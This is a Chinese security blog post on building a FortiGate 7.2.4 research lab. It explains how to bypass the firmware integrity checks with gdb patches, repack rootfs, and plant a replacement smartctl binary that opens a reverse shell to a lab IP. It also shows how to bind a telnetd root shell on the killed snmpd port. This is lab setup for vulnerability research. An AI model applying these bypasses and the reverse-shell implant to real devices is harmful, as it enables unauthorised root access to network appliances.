

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Vang3lis">
  <meta name="keywords" content="">
  <title>FortiGate 环境搭建 - Vang3lis&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_6peoq002giu.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.1.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>0x13</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2023-06-12 14:51" pubdate>
      2023年6月12日 下午
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.8k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      26
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">FortiGate 环境搭建</h1>
            
            <div class="markdown-body" id="post-body">
              <h2 id="FortiGate-镜像下载"><a href="#FortiGate-镜像下载" class="headerlink" title="FortiGate 镜像下载"></a>FortiGate 镜像下载</h2><p>从官网下载<code>FortiGate</code>镜像，用<code>VMware</code>打开<code>ovf</code>（本文搭建时，<code>ForiGate</code>最新版本为<code>7.2.4</code>）</p>
<p>会得到<code>FortiGate-disk1.vmdk</code>、<code>FortiGate-disk2.vmdk</code>等一些文件</p>
<h2 id="登录"><a href="#登录" class="headerlink" title="登录"></a>登录</h2><p>在设置虚拟机网卡时，看别人都没做什么设置，我本地的设置是<code>网络适配器1</code>为<code>VMnet8(NAT)</code>、<code>网络适配器2</code>为<code>VMnet0</code>、<code>网络适配器3</code>为<code>VMnet1</code></p>
<p>最初登录时用<code>admin: 空密码</code>，然后通过以下指令进行设置静态<code>ip</code></p>
<pre><code class="hljs routeros">config<span class="hljs-built_in"> system </span>interface
<span class="hljs-builtin-name">edit</span> port1
<span class="hljs-builtin-name">set</span> mode static
<span class="hljs-builtin-name">set</span><span class="hljs-built_in"> ip </span>192.168.x.x/255.255.255.0
end</code></pre>

<p>用<code>show system interface port1</code>查看<code>ip</code>设置</p>
<h2 id="挂载-vmdk"><a href="#挂载-vmdk" class="headerlink" title="挂载 vmdk"></a>挂载 vmdk</h2><p>先安装<code>libguestfs-tools</code></p>
<p>再通过<code>sudo virt-filesystems -a FortiGate-disk1.vmdk</code>分析<code>vmdk</code>的设备块，但是<code>Ubuntu20.04</code>及以上的版本均会报如下错</p>
<pre><code class="hljs sql">libguestfs: error: list_filesystems: sgdisk: Caution: invalid <span class="hljs-keyword">backup</span> GPT header, but valid <span class="hljs-keyword">main</span> header; regenerating
<span class="hljs-keyword">backup</span> header <span class="hljs-keyword">from</span> <span class="hljs-keyword">main</span> header.

<span class="hljs-keyword">Warning</span>! <span class="hljs-keyword">Main</span> <span class="hljs-keyword">and</span> <span class="hljs-keyword">backup</span> <span class="hljs-keyword">partition</span> <span class="hljs-keyword">tables</span> differ! <span class="hljs-keyword">Use</span> the <span class="hljs-string">&#x27;c&#x27;</span> <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;e&#x27;</span> options
<span class="hljs-keyword">on</span> the <span class="hljs-keyword">recovery</span> &amp; transformation menu <span class="hljs-keyword">to</span> examine the two tables.

<span class="hljs-keyword">Warning</span>! One <span class="hljs-keyword">or</span> more CRCs don<span class="hljs-string">&#x27;t match. You should repair the disk!</span>
<span class="hljs-string">Main header: OK</span>
<span class="hljs-string">Backup header: ERROR</span>
<span class="hljs-string">Main partition table: OK</span>
<span class="hljs-string">Backup partition table: ERROR</span>
<span class="hljs-string"></span>
<span class="hljs-string">Invalid partition data!</span></code></pre>

<p>如果用<code>Ubuntu18.04</code>不会报错，应该仅是<code>backup GPT header</code>不对，用<code>Ubuntu18.04</code>可以看到其设备块为<code>/dev/sda1 /dev/sda2 /dev/sda3</code></p>
<p>不用查看设备块，直接挂载<code>/dev/sda1</code>也可，这里的<code>-m</code>是指的<code>vmdk</code>中的设备块，会挂载到当前目录的<code>FortiGate</code>目录中</p>
<pre><code class="hljs haml">sudo guestmount -a FortiGate-disk1.vmdk -m /dev/sda1 --rw ./FortiGate

Usage:
  guestmount [--options] mountpoint
Options:
  -<span class="ruby">a<span class="hljs-params">|--add image       Add image</span></span>
<span class="ruby">  -m<span class="hljs-params">|--mount dev[:mnt[:opts[:fstype]] Mount dev on mnt (<span class="hljs-keyword">if</span> omitted, /)</span></span>
<span class="ruby">  -w<span class="hljs-params">|--rw              Mount read-write</span></span></code></pre>

<p>挂载之后，可得到如下目录</p>
<pre><code class="hljs css"><span class="hljs-selector-tag">bin</span>   <span class="hljs-selector-tag">boot</span><span class="hljs-selector-class">.msg</span>  <span class="hljs-selector-tag">config</span>         <span class="hljs-selector-tag">dhcpddb</span><span class="hljs-selector-class">.bak</span>         <span class="hljs-selector-tag">etc</span>            <span class="hljs-selector-tag">filechecksum</span>  <span class="hljs-selector-tag">flatkc</span><span class="hljs-selector-class">.chk</span>   <span class="hljs-selector-tag">ldlinux</span><span class="hljs-selector-class">.sys</span>  <span class="hljs-selector-tag">log</span>         <span class="hljs-selector-tag">rootfs</span><span class="hljs-selector-class">.gz</span>
<span class="hljs-selector-tag">boot</span>  <span class="hljs-selector-tag">cmdb</span>      <span class="hljs-selector-tag">dhcp6s_db</span><span class="hljs-selector-class">.bak</span>  <span class="hljs-selector-tag">dhcp_ipmac</span><span class="hljs-selector-class">.dat</span><span class="hljs-selector-class">.bak</span>  <span class="hljs-selector-tag">extlinux</span><span class="hljs-selector-class">.conf</span>  <span class="hljs-selector-tag">flatkc</span>        <span class="hljs-selector-tag">ldlinux</span><span class="hljs-selector-class">.c32</span>  <span class="hljs-selector-tag">lib</span>          <span class="hljs-selector-tag">lost</span>+<span class="hljs-selector-tag">found</span>  <span class="hljs-selector-tag">rootfs</span><span class="hljs-selector-class">.gz</span><span class="hljs-selector-class">.chk</span></code></pre>

<p>其中比较重要就是<code>exlinux.conf</code>、<code>flatkc</code>、<code>flatkc.chk</code>、<code>rootfs.gz</code>、<code>rootfs.gz.chk</code></p>
<pre><code class="hljs routeros">vangelis@0x13:~/Desktop$ cat ./FortiGate-backup/extlinux.conf 
DISPLAY boot.msg
TIMEOUT 10
TOTALTIMEOUT 9000
DEFAULT flatkc ro <span class="hljs-attribute">panic</span>=5 <span class="hljs-attribute">endbase</span>=0xA0000 <span class="hljs-attribute">console</span>=ttyS0, <span class="hljs-attribute">root</span>=/dev/ram0 <span class="hljs-attribute">ramdisk_size</span>=65536 <span class="hljs-attribute">initrd</span>=/rootfs.gz <span class="hljs-attribute">maxcpus</span>=1 <span class="hljs-attribute">mem</span>=2048M
vangelis@0x13:~/Desktop$ file ./flatkc
./flatkc: Linux kernel x86 boot executable bzImage, version 4.19.13 (root@build) #1 SMP Tue Jan 31 05:32:20 UTC 2023, RO-rootFS, swap_dev 0x6, Normal VGA</code></pre>

<h3 id="flatkc"><a href="#flatkc" class="headerlink" title="flatkc"></a>flatkc</h3><p>使用<a target="_blank" rel="noopener" href="https://github.com/marin-m/vmlinux-to-elf">vmlinux-to-elf</a>将<code>bzImage</code>转成<code>elf</code>，其主要在<code>fgt_verify</code>中检查<code>/sbin/init</code>和<code>/sbin/init.chk</code>是否匹配，只要修改<code>fgt_verify()</code>的返回值就可以绕过检测，走到<code>do_execve(&quot;/sbin/init&quot;)</code></p>
<p>P.S 调试时看到的<code>rootfs.gz</code>应该是在<code>kernel_init_freeable</code>中调用<code>unpack_rootfs</code></p>
<p><img src="/img/FortiGate-Setup/flatkc-kernel-init.png" srcset="/img/loading.gif" alt="flatkc-kernel-init"></p>
<h3 id="sbin-init"><a href="#sbin-init" class="headerlink" title="/sbin/init"></a>/sbin/init</h3><p>主要<code>verify_filesystem</code>中验证所有的文件系统，后面解压<code>bin</code>、<code>migadmin</code>、<code>node-scripts</code>、<code>usr</code>，再<code>execve(&quot;/bin/init&quot;)</code></p>
<p><img src="/img/FortiGate-Setup/sbin-init.png" srcset="/img/loading.gif" alt="sbin-init"></p>
<p>在<code>verify-filesystem</code>中<code>sub_401700</code>遍历所有的文件系统，然后算<code>hash</code>，最后跟<code>.fgtsum</code>的结果比较</p>
<p><img src="/img/FortiGate-Setup/verify-filesystem.png" srcset="/img/loading.gif" alt="verify-filesystem"></p>
<h3 id="bin-init"><a href="#bin-init" class="headerlink" title="/bin/init"></a>/bin/init</h3><p><code>/bin/init</code>是<code>FortiGate</code>中核心功能，几乎所有的后台运行的程序均链接到<code>/bin/init</code>，在<code>main</code>中存在一些检测</p>
<p><img src="/img/FortiGate-Setup/bin-init-main.png" srcset="/img/loading.gif" alt="bin-init-main"></p>
<p>在<code>verifyKernelAndRootfs_450510()</code>的地方会验证<code>flatkc</code>和<code>rootfs</code>文件目录的结果</p>
<h2 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h2><h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><p>最开始想的是，直接利用重打包<code>rootfs.gz</code>（注：这里<code>/dev/sda1</code>比较小，需要放到外面再重打包），调试虚拟机内核时修改<code>flatkc</code>中的指向<code>/sbin/init</code>的字符串为<code>/sh</code>，从而直接执行<code>busybox</code>的<code>sh</code>，结果不成功，可能是<code>/bin/init</code>中对于一些设备进行了初始化</p>
<p>于是还是得按照别人博客中的思路，重打包<code>rootfs.gz</code>，自己实现<code>/sbin/init</code>干的事情即解压文件，并把<code>/bin/busybox</code>丢进去；在调试内核的时候，修改<code>flatkc</code>的校验，使其不<code>panic</code>且修改其指向的字符串为<code>/bin/init</code>；执行<code>/bin/init</code>时修改验证的返回值，使其正常过检测</p>
<p>在重打包<code>rootfs.gz</code>的时候，修改<code>rootfs</code>中的<code>smartctl</code>的逻辑，通过 <a target="_blank" rel="noopener" href="https://github.com/leommxj/prebuilt-multiarch-bin/blob/bin/x86_64_tools/reverse_shell">reverse_shell</a> 反弹<code>shell</code>，然后通过<code>diagnose hardware smartctl</code>指令进行执行<code>smartctl</code></p>
<pre><code class="hljs c"><span class="hljs-comment">// gcc ./smartctl.c -static -o ./smartctl</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">shell</span><span class="hljs-params">()</span></span>&#123;
    system(<span class="hljs-string">&quot;/bin/busybox ls&quot;</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
    system(<span class="hljs-string">&quot;/bin/busybox id&quot;</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
    system(<span class="hljs-string">&quot;/bin/reverse_shell 192.168.152.128 2333 &amp;&amp; /bin/busybox id&quot;</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
    <span class="hljs-keyword">return</span>;
&#125;

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-keyword">int</span> argc, <span class="hljs-keyword">char</span> <span class="hljs-keyword">const</span> *argv[])</span></span>
<span class="hljs-function"></span>&#123;
    shell();
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
&#125;</code></pre>

<h3 id="操作"><a href="#操作" class="headerlink" title="操作"></a>操作</h3><p>首先给虚拟机的<code>vmx</code>加上如下语句，利用<code>debugStub</code>的特性对虚拟机进行调试，但是这个地方有个坑，就是如果用了<code>windows hyperV</code>就会在调试的时候跑飞，完全断不下来，<a target="_blank" rel="noopener" href="https://communities.vmware.com/t5/VMware-Workstation-Pro/debugStub-does-not-work-on-Windows-10-2004-with-Hyper-V/td-p/1868359">debugStub does not work on Windows 10 2004 with Hyper-V</a></p>
<pre><code class="hljs ini"><span class="hljs-attr">debugStub.listen.guest64</span> = <span class="hljs-string">&quot;TRUE&quot;</span>
<span class="hljs-attr">debugStub.listen.guest64.remote</span> = <span class="hljs-string">&quot;TRUE&quot;</span>
<span class="hljs-attr">debugStub.port.guest64</span> = <span class="hljs-string">&quot;12345&quot;</span>
<span class="hljs-attr">debugStub.listen.guest32</span> = <span class="hljs-string">&quot;TRUE&quot;</span>
<span class="hljs-attr">debugStub.listen.guest32.remote</span> = <span class="hljs-string">&quot;TRUE&quot;</span>
<span class="hljs-attr">debugStub.port.guest32</span> = <span class="hljs-string">&quot;12346&quot;</span>
<span class="hljs-attr">toolsInstallManager.updateCounter</span> = <span class="hljs-string">&quot;2&quot;</span>
<span class="hljs-attr">tools.remindInstall</span> = <span class="hljs-string">&quot;FALSE&quot;</span></code></pre>

<p>解压<code>rootfs</code>，直接用<code>cpio -idmv &lt; ../rootfs</code></p>
<p>解压的时候<code>xz</code>为其自己实现的，因此要用如下指令，将压缩的全部解压</p>
<pre><code class="hljs awk">chroot . <span class="hljs-regexp">/sbin/</span>xz -d usr.tar.xz
chroot . <span class="hljs-regexp">/sbin/</span>ftar -xf ./usr.tar</code></pre>

<p>重打包的指令如下</p>
<pre><code class="hljs jboss-cli">find . | cpio -o <span class="hljs-params">--format=newc</span> &gt; rootfs 
gzip rootfs

guestmount -a FortiGate-disk1.vmdk -m <span class="hljs-string">/dev/sda1</span> <span class="hljs-params">--rw</span> <span class="hljs-string">./FortiGate</span> 
<span class="hljs-keyword">cd</span> FortiGate
cp <span class="hljs-string">../xxx/rootfs.gz</span> <span class="hljs-string">./</span>
<span class="hljs-keyword">cd</span> <span class="hljs-string">..</span>
umount FortiGate</code></pre>

<p>在开启<code>FortiGate</code>之后出现如下字样后，进行远程调试，断在<code>fgt_verify()</code>的返回，修改其返回值，并修改其字符串为<code>/bin/init\x00</code>，然后再在<code>/bin/init</code>中下断点（其实这个地方，从内核层面给用户态的一个进程下断点，没太搞懂），修改返回值，就可以成功绕过检测了</p>
<p>建议使用裸<code>gdb</code></p>
<pre><code class="hljs erlang-repl">Loading flatkc... ok
Loading rootfs.gz... ok</code></pre>

<p>以下是写的一个<code>script</code>（注意这里<code>debugStub</code>起的是主机的端口）</p>
<pre><code class="hljs apache"><span class="hljs-attribute">file</span> ./flatkc-elf
<span class="hljs-attribute">target</span> remote <span class="hljs-number">192.168.152.1:12345</span>
<span class="hljs-attribute">b</span> *<span class="hljs-number">0</span>xffffffff<span class="hljs-number">80</span>c<span class="hljs-number">022</span>db
<span class="hljs-comment"># b *0xffffffff80c0231a</span>
<span class="hljs-attribute">b</span> *<span class="hljs-number">0</span>x<span class="hljs-number">452</span>BAC
<span class="hljs-attribute">b</span> *<span class="hljs-number">0</span>x<span class="hljs-number">452</span>DF<span class="hljs-number">3</span> 
<span class="hljs-attribute">b</span> *<span class="hljs-number">0</span>x<span class="hljs-number">452</span>BC<span class="hljs-number">6</span>
<span class="hljs-attribute">c</span>

<span class="hljs-attribute">define</span> context
  <span class="hljs-attribute">i</span> r
  <span class="hljs-attribute">x</span>/<span class="hljs-number">10</span>i $pc
<span class="hljs-attribute">end</span>

<span class="hljs-attribute">define</span> bypass
   <span class="hljs-attribute">set</span> $rax=<span class="hljs-number">0</span>
   <span class="hljs-attribute">patch</span>
   <span class="hljs-attribute">c</span>
<span class="hljs-attribute">end</span>

<span class="hljs-attribute">define</span> patch
  <span class="hljs-attribute">context</span>
  <span class="hljs-attribute">set</span> *(char*)<span class="hljs-number">0</span>xFFFFFFFF<span class="hljs-number">813</span>B<span class="hljs-number">779</span>D=&#x27;b&#x27;
  <span class="hljs-attribute">set</span> *(char*)<span class="hljs-number">0</span>xFFFFFFFF<span class="hljs-number">813</span>B<span class="hljs-number">779</span>E=&#x27;i&#x27;
  <span class="hljs-attribute">set</span> *(char*)<span class="hljs-number">0</span>xFFFFFFFF<span class="hljs-number">813</span>B<span class="hljs-number">779</span>F=&#x27;n&#x27;
  <span class="hljs-attribute">set</span> *(char*)<span class="hljs-number">0</span>xFFFFFFFF<span class="hljs-number">813</span>B<span class="hljs-number">77</span>A<span class="hljs-number">0</span>=&#x27;/&#x27;
  <span class="hljs-attribute">set</span> *(char*)<span class="hljs-number">0</span>xFFFFFFFF<span class="hljs-number">813</span>B<span class="hljs-number">77</span>A<span class="hljs-number">1</span>=&#x27;i&#x27;
  <span class="hljs-attribute">set</span> *(char*)<span class="hljs-number">0</span>xFFFFFFFF<span class="hljs-number">813</span>B<span class="hljs-number">77</span>A<span class="hljs-number">2</span>=&#x27;n&#x27;
  <span class="hljs-attribute">set</span> *(char*)<span class="hljs-number">0</span>xFFFFFFFF<span class="hljs-number">813</span>B<span class="hljs-number">77</span>A<span class="hljs-number">3</span>=&#x27;i&#x27;
  <span class="hljs-attribute">set</span> *(char*)<span class="hljs-number">0</span>xFFFFFFFF<span class="hljs-number">813</span>B<span class="hljs-number">77</span>A<span class="hljs-number">4</span>=&#x27;t&#x27;
  <span class="hljs-attribute">set</span> *(char*)<span class="hljs-number">0</span>xFFFFFFFF<span class="hljs-number">813</span>B<span class="hljs-number">77</span>A<span class="hljs-number">5</span>=&#x27;\x<span class="hljs-number">00</span>&#x27;
  <span class="hljs-attribute">x</span>/s <span class="hljs-number">0</span>xFFFFFFFF<span class="hljs-number">813</span>B<span class="hljs-number">779</span>C
<span class="hljs-attribute">end</span></code></pre>

<h2 id="开启telnetd"><a href="#开启telnetd" class="headerlink" title="开启telnetd"></a>开启telnetd</h2><p>在开启<code>telnetd</code>的地方，在<code>7.2.4</code>的版本上，应该存在较大的改动，<code>killall -9 sshd</code>之后会立刻重启，基本上没成功的用<code>telnetd</code>占上<code>22</code>端口，其他的端口也被墙了，最后在<code>ZOE</code>大佬的帮助下，利用开启<code>snmp</code>服务，然后发现并没有检测<code>kill snmpd</code>，因此可以直接利用<code>snmp</code>被<code>kill</code>掉的<code>161</code>和<code>162</code>端口，进行开启<code>telnet</code>和<code>gdbserver</code>转发</p>
<p>就是在<code>Network/interfaces</code>中，修改<code>port1</code>，把<code>snmp</code>打开</p>
<pre><code class="hljs angelscript">killall <span class="hljs-number">-9</span> snmpd &amp;&amp; /bin/busybox telnetd -l /bin/sh -b <span class="hljs-number">0.0</span><span class="hljs-number">.0</span><span class="hljs-number">.0</span> -p <span class="hljs-number">162</span>
/bin/gdbserver --attach <span class="hljs-number">127.0</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span>:<span class="hljs-number">161</span> sslvpndPid</code></pre>

<p>如果逆向到后面，可以找到<code>/bin/init</code>中的<code>sshd</code>的<code>Service</code>注册的位置，把注册的位置改成<code>while(1)</code>，同样也是可以<code>kill sshd</code>，占用<code>22</code>端口开启<code>telnetd</code>服务的</p>
<h2 id="配置ip"><a href="#配置ip" class="headerlink" title="配置ip"></a>配置ip</h2><p><a target="_blank" rel="noopener" href="https://help.fortinet.com/fdb/5-0-0/html/source/tasks/t_network_configuration_cli.html">官方文档</a></p>
<pre><code class="hljs routeros">config<span class="hljs-built_in"> system </span>interface
  <span class="hljs-builtin-name">edit</span> &lt;port&gt;
  <span class="hljs-builtin-name">set</span><span class="hljs-built_in"> ip </span>&lt;ip_address&gt; &lt;netmask&gt;
  <span class="hljs-builtin-name">set</span> allowaccess (http https<span class="hljs-built_in"> ping </span>ssh telnet)
end</code></pre>

<h2 id="python3-tlsv1-报错"><a href="#python3-tlsv1-报错" class="headerlink" title="python3 tlsv1 报错"></a>python3 tlsv1 报错</h2><p>用<code>python3</code>写<code>SSL</code>连接时报错如下</p>
<pre><code class="hljs stata">  <span class="hljs-keyword">File</span> <span class="hljs-string">&quot;/usr/lib/python3.8/ssl.py&quot;</span>, <span class="hljs-keyword">line</span> 500, <span class="hljs-keyword">in</span> wrap_socket
    <span class="hljs-keyword">return</span> self.sslsocket_class._create(
  <span class="hljs-keyword">File</span> <span class="hljs-string">&quot;/usr/lib/python3.8/ssl.py&quot;</span>, <span class="hljs-keyword">line</span> 1040, <span class="hljs-keyword">in</span> _create
    self.do_handshake()
  <span class="hljs-keyword">File</span> <span class="hljs-string">&quot;/usr/lib/python3.8/ssl.py&quot;</span>, <span class="hljs-keyword">line</span> 1309, <span class="hljs-keyword">in</span> do_handshake
    self._sslobj.do_handshake()
ssl.SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol <span class="hljs-keyword">version</span> (_ssl.c:1131)</code></pre>

<p>是因为<code>ubuntu 20.04</code>最低的<code>tls</code>版本设置高于<code>tlsv1</code>，因此需要修改<code>/etc/ssl/openssl.cnf</code>的配置</p>
<p>需要在文件第一行加上<code>openssl_conf = default_conf</code></p>
<p>文件尾再加上</p>
<pre><code class="hljs ini"><span class="hljs-section">[default_conf]</span>
<span class="hljs-attr">ssl_conf</span> = ssl_sect

<span class="hljs-section">[ssl_sect]</span>
<span class="hljs-attr">system_default</span> = system_default_sect

<span class="hljs-section">[system_default_sect]</span>
<span class="hljs-attr">MinProtocol</span> = TLSv1
<span class="hljs-attr">CipherString</span> = DEFAULT@SECLEVEL=<span class="hljs-number">1</span></code></pre>

<p>如果想要<code>requests</code>不报<code>warning</code>，需要加上如下代码在<code>python3</code>脚本中</p>
<pre><code class="hljs routeros"><span class="hljs-keyword">from</span> urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(<span class="hljs-attribute">category</span>=InsecureRequestWarning)</code></pre>

<p>这部分的报错解决很久，最后是在<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44338780/article/details/117912301">ubuntu 20.04启用TLSv1</a>找到的</p>
<h2 id="引用"><a href="#引用" class="headerlink" title="引用"></a>引用</h2><blockquote>
<p><a target="_blank" rel="noopener" href="https://forum.butian.net/share/2166">https://forum.butian.net/share/2166</a><br><a target="_blank" rel="noopener" href="https://wzt.ac.cn/2022/12/15/CVE-2022-42475/">https://wzt.ac.cn/2022/12/15/CVE-2022-42475/</a></p>
</blockquote>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/setup/">setup</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/FortiGate/">FortiGate</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/07/20/ASA%20%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">ASA 环境搭建</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/03/21/SharePoint%20%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">
                        <span class="hidden-mobile">SharePoint 环境搭建</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "FortiGate 环境搭建&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



